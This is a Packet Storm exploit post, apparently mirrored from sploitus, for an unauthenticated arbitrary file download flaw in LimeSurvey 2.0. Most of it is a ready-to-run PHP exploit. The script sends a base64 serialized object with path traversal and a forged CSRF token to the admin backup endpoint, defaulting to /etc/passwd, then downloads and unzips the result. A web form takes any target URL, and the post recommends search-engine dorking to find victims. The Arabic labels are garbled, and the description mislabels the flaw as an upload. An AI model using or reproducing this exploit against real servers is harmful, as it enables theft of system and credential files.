Share
## https://sploitus.com/exploit?id=PACKETSTORM:213291
=============================================================================================================================================
    | # Title     : Limesurvey 2.0 unauthenticated file download vulnerability                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.limesurvey.org/                                                                                                 |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: This script exploits the unauthenticated file upload vulnerability in LimeSurvey, which allows an attacker to download any file from the targeted server.
       
       (linked: https://packetstorm.news/files/id/180855/ Linked CVE numbers: ),
    	
    [+] save code as poc.php.
    
    [+] USage : http://127.0.0.1/poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class LimeSurveyExploit {
        private $target;
        private $filepath;
        private $traversalDepth;
    
        public function __construct($target, $filepath = '/etc/passwd', $traversalDepth = 15) {
            $this->target = rtrim($target, '/');
            $this->filepath = $filepath;
            $this->traversalDepth = $traversalDepth;
        }
    
        private function generatePayload() {
            $traversal = str_repeat('/..', $this->traversalDepth);
            $file = $traversal . $this->filepath;
            $serialized = 'a:1:{i:0;O:16:"CMultiFileUpload":1:{s:4:"file";s:' . strlen($file) . ':"' . $file . '";}}';
            return base64_encode($serialized);
        }
    
        public function execute() {
            $csrf_token = bin2hex(random_bytes(5));
            $postFields = [
                'YII_CSRF_TOKEN' => $csrf_token,
                'destinationBuild' => bin2hex(random_bytes(3)),
                'datasupdateinfo' => $this->generatePayload()
            ];
    
            $response = $this->sendRequest("{$this->target}/index.php/admin/update/sa/backup", $postFields, $csrf_token);
    
            if ($response && strpos($response, 'Download this file') !== false) {
                if (preg_match('/<a class="btn btn-success" href="([^"]+)" title="Download this file">/', $response, $matches)) {
                    $downloadUrl = $matches[1];
                    echo "Downloading backup from URL: $downloadUrl\n";
                    $this->downloadFile($downloadUrl);
                } else {
                    echo "Failed to extract download link.\n";
                }
            } else {
                echo "Failed to exploit the vulnerability.\n";
            }
        }
    
        private function sendRequest($url, $postFields, $csrf_token) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postFields));
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: YII_CSRF_TOKEN=$csrf_token"]);
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        private function downloadFile($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            $data = curl_exec($ch);
            curl_close($ch);
    
            if ($data) {
                $zipFile = 'downloaded.zip';
                file_put_contents($zipFile, $data);
                echo "File downloaded successfully: $zipFile\n";
                $this->extractZip($zipFile);
            } else {
                echo "Failed to download file.\n";
            }
        }
    
        private function extractZip($zipFile) {
            $zip = new ZipArchive;
            if ($zip->open($zipFile) === TRUE) {
                $zip->extractTo('./extracted/');
                $zip->close();
                echo "Files extracted to ./extracted/\n";
            } else {
                echo "Failed to extract ZIP file.\n";
            }
        }
    }
    
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $target = $_POST['target'];
        $filepath = $_POST['filepath'];
        $exploit = new LimeSurveyExploit($target, $filepath);
        $exploit->execute();
    }
    ?>
    
    <!DOCTYPE html>
    <html lang="ar">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>ุงุณุชุบู„ุงู„ LimeSurvey</title>
    </head>
    <body>
        <h2>ุงุณุชุบู„ุงู„ ุชุญู…ูŠู„ ุงู„ู…ู„ูุงุช ุบูŠุฑ ุงู„ู…ูˆุซู‚ - LimeSurvey</h2>
        <form method="POST">
            <label>ุนู†ูˆุงู† ุงู„ู…ูˆู‚ุน ุงู„ู…ุณุชู‡ุฏู:</label>
            <input type="text" name="target" required><br>
            <label>ุงู„ู…ุณุงุฑ ุงู„ู…ุทู„ูˆุจ:</label>
            <input type="text" name="filepath" value="/etc/passwd" required><br>
            <button type="submit">ุชู†ููŠุฐ</button>
        </form>
    </body>
    </html>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================